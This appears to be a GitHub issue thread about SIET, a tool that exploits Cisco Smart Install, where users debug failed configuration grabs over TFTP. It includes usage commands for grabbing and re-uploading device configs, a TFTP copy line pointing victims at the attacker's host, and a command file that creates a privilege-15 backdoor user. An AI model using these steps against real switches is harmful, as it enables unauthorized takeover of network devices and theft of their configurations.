When running -g nothing is grabbed
usmarine2141 opened this issue · 17 comments
When running the get config (-g) no config is actually downloaded.
or does it keep it on the device itself and then go grab it?
Here is an output that happens on occasion:
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: Sending TCP packet to 192.168.200.254
[INFO]: Package send success to 192.168.200.254:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
[INFO]: connect from
Traceback (most recent call last):
File "sTFTP.py", line 149, in
TftpServer('', TFTP_SOCK_TIMEOUT)
File "sTFTP.py", line 43, in TftpServer
print '[INFO]: connect from ', raddress, rport
UnboundLocalError: local variable 'raddress' referenced before assignment
Is your attacking host accessible to the internet on UDP port 69? The vulnerable device must be able to reach the included TFTP server provided by SIET.
Per the README, using -g
SIET first modifies the TFTP server on the vulnerable device and then issues a command for it to copy off the config to the previously transferred TFTP server address.
A firewall between you and the victim can block incoming packets sometimes. In some cases it is an empty configuration file, and I don't know why )
You can try to run Wireshark and see what gonna happen.
It appears the TFTP server isn't running. I have many ports forwarded to this box, and port 69 is one of them. UDP and TCP and it is still not showing it as being able to see it while running the -g command, but when checking on my ssh port it sees it without an issue.
I have also just tried to run python sTFTP.py on its own and test with the port and it is not showing up.
I have opened ports in the local firewall for port 69, and even turned it off.
This was run while python siet.py -g -t x.x.x.x was being run
What OS are you using?
You also don't see port 69 in sudo netstat -tulpn?
You can open a UDP port by yourself with sudo netcat -ul 69 and try to get the configuration file into it.
Not sure if you still develop this tool,
I tried the -e option; the message shows the file was uploaded, but actually it was not.
c3 = 'copy tftp://' + my_ip + '/' + exec_file + ' flash:'
I am not sure if the complete copy command is needed in this case, I have revised the code, but no luck.
Any command on this issue?
I can't understand what exactly you want to do.
With the -e option you give a command to the device to upload your file with a commands list. In new IOS this list will be executed.
Copy is a standard Cisco command that needs a destination to upload the file, and I don't see another way to do that.
https://www.cisco.com/c/en/us/td/docs/ios/fundamentals/command/reference/cf_book/cf_c1.html
I use -e, the tftp log told the config file is uploaded successfully, but when I checked on SW, the config file was not uploaded. (show flash: on 2960s)
I tried to run the sTFTP alone, and uploaded the config file from device to sw manually, it is ok!
First, -e is not for config files. It's a command list only. For config files use -g and -c.
If you can write Wireshark dump when you uploaded the config file from device to sw manually, it will be very helpful.
I will later provide you the pyshark dump.
But isn't the -e an option that is used to execute command toward the affected device by reading the config file?
My purpose is to change the device config~
There are two options after -e: one is "d", the other is a file path.
And then a execute.txt or my_exe.txt will be created at tftp directory.
But none of the files will be uploaded to the affected sw~
Do you have slack for a discussion?
With -e option you will execute commands from file.
For example:
cat tftp/execute.txt
"username cisco privilege 15 secret 0 cisco"
"exit"
After uploading this file cisco device will create new user.
If you want to change the config of the device, you have to use the -c option.
But this option works only for 3.6.0E+ and 15.2(2)E+ IOS versions.
I gave link to my presentation slides in readme and you can read this for more explanations.
I have telegram account: @Sab0tag3d (https://t.me/sab0tag3d)
Hello, first off I want to say I love your tool. I have done well securing stuff with this, made money via bounties, and also learned a lot and created a diff toolkit based off this tool's findings. You are awesome.
Now the thing I have noticed is if you are having trouble with the tftp code, either reboot or do a ps aux | grep tftp
If you see processes just kill them; if that doesn't alleviate the problem then you more than likely are dealing with a NAT issue.
On a side note also like the owner said the -e switch is used to provide the device with a command, and that only works on newer versions.
python siet.py -t -i ip -> confirm vuln
python siet.py -g -i ip -> grab config
python siet.py -c -i ip -> re upload presumably modified config
I'm getting the same issue. It might be worth adding a message to say that the file transfer was not successful if it fails. I think the confusion comes from the fact that the tool outputs positive success messages regardless of whether the config download was successful.
I think it is a great idea. We can check the file for zero size and, if it is, show a message that something went wrong.
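The zero-size check suggested above, extended to also read the sTFTP log, as an added example that is not part of SIET or of any post in this thread. The log line formats and the tftp/<ip>.conf file name are taken from the output quoted in this thread; `transfer_status` and its return labels are hypothetical names.

```python
import os
import re
import tempfile

# Line formats taken from the sTFTP output quoted in this thread.
CONNECT_RE = re.compile(r"\[INFO\]: connect from (\d+\.\d+\.\d+\.\d+) \d+")
FINISH_RE = re.compile(r"\[put\] file (\S+) finish download, size: (\d+)")


def transfer_status(log_text, device_ip, tftp_dir="tftp"):
    """Return 'no-connection', 'incomplete', 'empty' or 'ok' for one -g run."""
    name = device_ip + ".conf"
    if device_ip not in CONNECT_RE.findall(log_text):
        # "Getting config done" alone only means the request was sent.
        return "no-connection"
    sizes = [int(size) for path, size in FINISH_RE.findall(log_text)
             if os.path.basename(path) == name]
    path = os.path.join(tftp_dir, name)
    if not sizes or not os.path.isfile(path):
        return "incomplete"
    if sizes[-1] == 0 or os.path.getsize(path) == 0:
        return "empty"
    return "ok"


# Log lines as posted in this thread: one run without a TFTP session, one with.
RUN_WITHOUT_TRANSFER = """\
[INFO]: Sending TCP packet to 192.168.30.29
[INFO]: Package send success to 192.168.30.29:
[INFO]: Getting config done
[INFO]: binding socket .. ok
"""
RUN_WITH_TRANSFER = RUN_WITHOUT_TRANSFER + """\
[INFO]: connect from 192.168.30.29 55045
[INFO]:[192.168.30.29]:[put] file tftp/192.168.30.29.conf finish download, size: 3804
"""


def demo():
    """Check both runs against a scratch directory (constructed file content)."""
    with tempfile.TemporaryDirectory() as d:
        before = transfer_status(RUN_WITHOUT_TRANSFER, "192.168.30.29", d)
        with open(os.path.join(d, "192.168.30.29.conf"), "wb") as fh:
            fh.write(b"!" * 3804)
        after = transfer_status(RUN_WITH_TRANSFER, "192.168.30.29", d)
        open(os.path.join(d, "192.168.30.29.conf"), "wb").close()  # truncate
        empty = transfer_status(RUN_WITH_TRANSFER, "192.168.30.29", d)
    return before, after, empty


if __name__ == "__main__":
    print(demo())
```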
In Linux kali 5.9.0-kali1-amd64 #1 SMP Debian 5.9.1-1kali2 (2020-10-29) x86_64 GNU/Linux, when running the get config (-g), no config is actually downloaded.
Here is an output that happens on occasion:
python siet.py -g -i 192.168.30.29
[INFO]: Sending TCP packet to 192.168.30.29
[INFO]: Package send success to 192.168.30.29:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
But when I used Linux kali 5.10.0-kali8-amd64 #1 SMP Debian 5.10.40-1kali1 (2021-05-31) x86_64 GNU/Linux, when running the get config (-g), the config is downloaded.
Here is an output that happens on occasion:
python siet.py -g -i 192.168.30.29
[INFO]: Sending TCP packet to 192.168.30.29
[INFO]: Package send success to 192.168.30.29:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: connect from 192.168.30.29 55045
[INFO]:[192.168.30.29] puting file 192.168.30.29.conf octet
[INFO]:[192.168.30.29]:[put] success binding data port 44000
[INFO]:[192.168.30.29]:[put] file tftp/192.168.30.29.conf finish download, size: 3804
I checked both of them in Wireshark:
I don't know why TFTP doesn't work!
As you can see in the dump, the server didn't even try to send you a TFTP package. If it were a problem in the TFTP server, you would see the package refused.
I guess the issue here is unfortunately how the protocol works. When you send the package the first time, you change the settings of the device and put your IP address (192.168.30.29) as a backup server for configuration files. Next time you send the package with the same address, the device sees that the configuration of the backup server wasn't changed and does nothing. The device will try to send the config file later by schedule. Just open the UDP 69 port for a while and hopefully you will see the device request.